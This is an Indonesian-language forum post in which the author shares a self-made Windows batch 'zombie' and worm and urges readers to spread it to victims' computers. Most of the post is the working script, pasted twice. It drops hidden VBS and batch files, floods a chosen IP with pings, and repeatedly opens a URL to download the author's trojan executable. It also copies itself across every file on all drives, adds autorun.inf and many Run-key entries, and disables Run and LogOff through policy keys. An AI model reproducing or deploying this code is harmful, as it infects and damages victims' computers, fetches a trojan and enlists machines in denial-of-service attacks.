zombie versi batch -VM sohai
dulu pernah buat nie thread but dah ke hapus ,mybe krna paas serangan dulu2 di hn.
hem ok nie gw cuma mau share ajah zombie buatan gw.
nah ini dia script code nya
PERHATIAN JIKA KOMPUTER SUDAH TERKENA ZOMBIE INI GW BARU BUAT REMOVE NYA HANYA UNTUK ZOMBIE SAJA,UNTUK WORM BELUM DI PIKIRKAN.
hem ok nie gw cuma mau share ajah zombie buatan gw.
Quote: ----------------------PERHATIAN----------------------
1.Jangan sekali-kali mencoba di komputer sendiri karena zombie ini untuk di komputer victim/korban.
jadi ini harus di sebar ke komputer orang lain agar menjadi wadah zombie ini jalan.
2.Cara kerjanya mudah sekali tinggal di klik zombie jalan.
efek yang bisa di lihat ketika komputer telah shutdown atau logoff
3.ketika komputer hidup dari logoff atau shutdown zombie ini akan menciptakan 2 anakan zombie,1 worm,autorun dan 1 file pendukung untuk me jalankan 2 zombie dan 1 worm.
anakan zombie 1 dengan nama boot.bat
untuk menyerang ip 192.168.1.1
ip nya bisa di ganti sesuai keinginan anda mau menyerang web apa.
anakan zombie 2 dengan nama 736F686169207761732068657265.bat
berfungis untuk mendownload file server trojan gw
yg bisa di akses di http://h1.ripway.com/hack02/sex.exe
jika kalian punya file server trojan sendiri bisa di tambahkan.
teakhir 1 worm untuk penyebaran,dan pertahanan.
nah ini dia script code nya
Spoiler: hide
::Prompt di baca off::
echo off
::Memberi judul prompt::
title 736F686169207761732068657265
::Memberi warna background hitam dan tulisan hijau muda::
color 0a
::Menghapus layar Prompt::
cls
::Membuat anakan 1 dengan nama wxhshell.vbs :
echo Set wshshell = wscript.CreateObject("WScript.Shell") >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "cmd" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "echo off " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "color 0a " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Title sohai was here " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "mode 33,10 " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "cls " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::Your" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Computer" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Is" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Not" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Secure::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::I " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Will" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Attacking" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Your" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Gateway::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\windows\system32\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\windows\system32\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "D:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "E:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "F:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "D:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "E:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "F:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "D:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "E:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "F:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
::Membuat anakan Zombie 1 dengan nama boot.bat dan memmiliki fungsi untuk DDOS::
echo echo off >>C:\windows\system32\boot.bat
echo title 0x44444F5320762C736F686169 >>C:\windows\system32\boot.bat
echo mode 67,16 >>C:\windows\system32\boot.bat
echo color 0c >>C:\windows\system32\boot.bat
echo cls >>C:\windows\system32\boot.bat
echo :DDOS >>C:\windows\system32\boot.bat
echo echo Attacking Server 192.168.1.1 >>C:\windows\system32\boot.bat
echo ping 192.168.1.1 -i 100000 -t >nul >>C:\windows\system32\boot.bat
echo goto DDOS >>C:\windows\system32\boot.bat
::Membuat anakan Zombie 2 dengan nama 736F686169207761732068657265.bat tolong bahasa hexa ini JANGAN di ubah::
echo echo off >>C:\windows\system32\736F686169207761732068657265.bat
echo color 0a >>C:\windows\system32\736F686169207761732068657265.bat
echo cls >>C:\windows\system32\736F686169207761732068657265.bat
echo :736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat
::connect ke ripway untuk mendownload file sex.exe::
echo start firefox "http://h1.ripway.com/hack02/sex.exe" >>C:\windows\system32\736F686169207761732068657265.bat
echo goto 736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat
::Membuat pertahanan untuk worm 7461737961.bat berbentuk folder::
MD\\.\\C:\CON
MD\\.\\D:\CON
MD\\.\\E:\CON
MD\\.\\F:\CON
::membuat pertahhanan untuk zombie2 berbentuk folder aux::
MD\\.\\C:\aux
MD\\.\\D:\aux
MD\\.\\E:\aux
MD\\.\\F:\aux
::Membuat Worm1 di tambah fungsi manipulasi regedit,dan penyebaran::
echo echo off >>C:\CON\7461737961.bat
echo cls >>C:\CON\7461737961.bat
echo color oa >>C:\CON\7461737961.bat
::Fungsi manipulasi::
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoRun" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoLogOff" /t REG_BINARY /d 01000000 >>C:\CON\7461737961.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoStartMenuMorePrograms" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat
echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "S.O.H.A.I Was Here" /f >>C:\CON\7461737961.bat
echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "Hack by S.O.H.A.I" >>C:\CON\7461737961.bat
::Penyebaran::
echo For /R C":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R D":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R E":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R F":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
::Membuat C:\windows\system32\boot.bat tercopy pada drive C D E F ::
copy "C:\windows\system32\boot.bat" "C:\boot.bat"
copy "C:\windows\system32\boot.bat" "D:\boot.bat"
copy "C:\windows\system32\boot.bat" "E:\boot.bat"
copy "C:\windows\system32\boot.bat" "F:\boot.bat"
::Membuat C:\CON\7461737961.bat tercopy pada folder CON D E F ::
copy "C:\CON\7461737961.bat" "D:\CON\7461737961.bat"
copy "C:\CON\7461737961.bat" "E:\CON\7461737961.bat"
copy "C:\CON\7461737961.bat" "F:\CON\7461737961.bat"
::Membuat C:\CON\7461737961.bat tercopy pada folder aux D E F ::
copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat"
:::membuat C:\windows\system32\736F686169207761732068657265.bat tercopy pada folder C D E F ::
copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat"
::Membuat boot.bat , 736F686169207761732068657265.bat dan 7461737961.bat pada drive C terhidden ::
Attrib +r +h C:\windows\system32\boot.bat
Attrib +r +h C:\windows\system32\736F686169207761732068657265.bat
Attrib +r +h C:\CON\7461737961.bat
Attrib +r +h D:\CON\7461737961.bat
Attrib +r +h E:\CON\7461737961.bat
Attrib +r +h F:\CON\7461737961.bat
Attrib +r +h C:\boot.bat
Attrib +r +h D:\boot.bat
Attrib +r +h E:\boot.bat
Attrib +r +h F:\boot.bat
Attrib +r +h C:\aux\736F686169207761732068657265.bat
Attrib +r +h D:\aux\736F686169207761732068657265.bat
Attrib +r +h E:\aux\736F686169207761732068657265.bat
Attrib +r +h F:\aux\736F686169207761732068657265.bat
::Membuat file autorun.inf di drive C dan memiliki Arti = Virus Membuat File Autorun Agar Virus bisa Berjalan Secara Otomatis::
echo [Autorun] >> C:\autorun.inf
echo shellexecute=boot.bat >> C:\autorun.inf
::Mengcopy salinan autorun.inf pada drive C ke semua drive D E F::
Copy "C:\autorun.inf" "D:\autorun.inf"
Copy "C:\autorun.inf" "E:\autorun.inf"
Copy "C:\autorun.inf" "F:\autorun.inf"
::Membuat file autorun ter hidden dari drive C D E F ::
Attrib +r +h C:\autorun.inf
Attrib +r +h D:\autorun.inf
Attrib +r +h E:\autorun.inf
Attrib +r +h F:\autorun.inf
::Proses auto running file zombie dan worm::
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wxhshell /t REG_SZ /d C:\windows\system32\wxhshell.vbs /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot /t REG_SZ /d C:\windows\system32\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot1 /t REG_SZ /d C:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot2 /t REG_SZ /d D:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot3 /t REG_SZ /d E:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot4 /t REG_SZ /d F:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F686169207761732068657265 /t REG_SZ /d C:\windows\system32\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572651 /t REG_SZ /d C:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572652 /t REG_SZ /d D:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572653 /t REG_SZ /d E:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572654 /t REG_SZ /d F:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 7461737961 /t REG_SZ /d C:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379612 /t REG_SZ /d D:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379613 /t REG_SZ /d E:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379614 /t REG_SZ /d F:\CON\7461737961.bat /f
echo off
::Memberi judul prompt::
title 736F686169207761732068657265
::Memberi warna background hitam dan tulisan hijau muda::
color 0a
::Menghapus layar Prompt::
cls
::Membuat anakan 1 dengan nama wxhshell.vbs :
echo Set wshshell = wscript.CreateObject("WScript.Shell") >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "cmd" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "echo off " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "color 0a " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Title sohai was here " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "mode 33,10 " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "cls " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::Your" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Computer" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Is" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Not" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Secure::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::I " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Will" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Attacking" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Your" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Gateway::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\windows\system32\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\windows\system32\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "D:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "E:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "F:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "D:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "E:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "F:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "C:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "D:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "E:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.run "F:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
::Membuat anakan Zombie 1 dengan nama boot.bat dan memmiliki fungsi untuk DDOS::
echo echo off >>C:\windows\system32\boot.bat
echo title 0x44444F5320762C736F686169 >>C:\windows\system32\boot.bat
echo mode 67,16 >>C:\windows\system32\boot.bat
echo color 0c >>C:\windows\system32\boot.bat
echo cls >>C:\windows\system32\boot.bat
echo :DDOS >>C:\windows\system32\boot.bat
echo echo Attacking Server 192.168.1.1 >>C:\windows\system32\boot.bat
echo ping 192.168.1.1 -i 100000 -t >nul >>C:\windows\system32\boot.bat
echo goto DDOS >>C:\windows\system32\boot.bat
::Membuat anakan Zombie 2 dengan nama 736F686169207761732068657265.bat tolong bahasa hexa ini JANGAN di ubah::
echo echo off >>C:\windows\system32\736F686169207761732068657265.bat
echo color 0a >>C:\windows\system32\736F686169207761732068657265.bat
echo cls >>C:\windows\system32\736F686169207761732068657265.bat
echo :736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat
::connect ke ripway untuk mendownload file sex.exe::
echo start firefox "http://h1.ripway.com/hack02/sex.exe" >>C:\windows\system32\736F686169207761732068657265.bat
echo goto 736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat
::Membuat pertahanan untuk worm 7461737961.bat berbentuk folder::
MD\\.\\C:\CON
MD\\.\\D:\CON
MD\\.\\E:\CON
MD\\.\\F:\CON
::membuat pertahhanan untuk zombie2 berbentuk folder aux::
MD\\.\\C:\aux
MD\\.\\D:\aux
MD\\.\\E:\aux
MD\\.\\F:\aux
::Membuat Worm1 di tambah fungsi manipulasi regedit,dan penyebaran::
echo echo off >>C:\CON\7461737961.bat
echo cls >>C:\CON\7461737961.bat
echo color oa >>C:\CON\7461737961.bat
::Fungsi manipulasi::
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoRun" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoLogOff" /t REG_BINARY /d 01000000 >>C:\CON\7461737961.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoStartMenuMorePrograms" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat
echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "S.O.H.A.I Was Here" /f >>C:\CON\7461737961.bat
echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "Hack by S.O.H.A.I" >>C:\CON\7461737961.bat
::Penyebaran::
echo For /R C":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R D":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R E":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R F":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
::Membuat C:\windows\system32\boot.bat tercopy pada drive C D E F ::
copy "C:\windows\system32\boot.bat" "C:\boot.bat"
copy "C:\windows\system32\boot.bat" "D:\boot.bat"
copy "C:\windows\system32\boot.bat" "E:\boot.bat"
copy "C:\windows\system32\boot.bat" "F:\boot.bat"
::Membuat C:\CON\7461737961.bat tercopy pada folder CON D E F ::
copy "C:\CON\7461737961.bat" "D:\CON\7461737961.bat"
copy "C:\CON\7461737961.bat" "E:\CON\7461737961.bat"
copy "C:\CON\7461737961.bat" "F:\CON\7461737961.bat"
::Membuat C:\CON\7461737961.bat tercopy pada folder aux D E F ::
copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat"
:::membuat C:\windows\system32\736F686169207761732068657265.bat tercopy pada folder C D E F ::
copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat"
::Membuat boot.bat , 736F686169207761732068657265.bat dan 7461737961.bat pada drive C terhidden ::
Attrib +r +h C:\windows\system32\boot.bat
Attrib +r +h C:\windows\system32\736F686169207761732068657265.bat
Attrib +r +h C:\CON\7461737961.bat
Attrib +r +h D:\CON\7461737961.bat
Attrib +r +h E:\CON\7461737961.bat
Attrib +r +h F:\CON\7461737961.bat
Attrib +r +h C:\boot.bat
Attrib +r +h D:\boot.bat
Attrib +r +h E:\boot.bat
Attrib +r +h F:\boot.bat
Attrib +r +h C:\aux\736F686169207761732068657265.bat
Attrib +r +h D:\aux\736F686169207761732068657265.bat
Attrib +r +h E:\aux\736F686169207761732068657265.bat
Attrib +r +h F:\aux\736F686169207761732068657265.bat
::Membuat file autorun.inf di drive C dan memiliki Arti = Virus Membuat File Autorun Agar Virus bisa Berjalan Secara Otomatis::
echo [Autorun] >> C:\autorun.inf
echo shellexecute=boot.bat >> C:\autorun.inf
::Mengcopy salinan autorun.inf pada drive C ke semua drive D E F::
Copy "C:\autorun.inf" "D:\autorun.inf"
Copy "C:\autorun.inf" "E:\autorun.inf"
Copy "C:\autorun.inf" "F:\autorun.inf"
::Membuat file autorun ter hidden dari drive C D E F ::
Attrib +r +h C:\autorun.inf
Attrib +r +h D:\autorun.inf
Attrib +r +h E:\autorun.inf
Attrib +r +h F:\autorun.inf
::Proses auto running file zombie dan worm::
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wxhshell /t REG_SZ /d C:\windows\system32\wxhshell.vbs /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot /t REG_SZ /d C:\windows\system32\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot1 /t REG_SZ /d C:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot2 /t REG_SZ /d D:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot3 /t REG_SZ /d E:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot4 /t REG_SZ /d F:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F686169207761732068657265 /t REG_SZ /d C:\windows\system32\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572651 /t REG_SZ /d C:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572652 /t REG_SZ /d D:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572653 /t REG_SZ /d E:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572654 /t REG_SZ /d F:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 7461737961 /t REG_SZ /d C:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379612 /t REG_SZ /d D:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379613 /t REG_SZ /d E:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379614 /t REG_SZ /d F:\CON\7461737961.bat /f
PERHATIAN JIKA KOMPUTER SUDAH TERKENA ZOMBIE INI GW BARU BUAT REMOVE NYA HANYA UNTUK ZOMBIE SAJA,UNTUK WORM BELUM DI PIKIRKAN.
Comments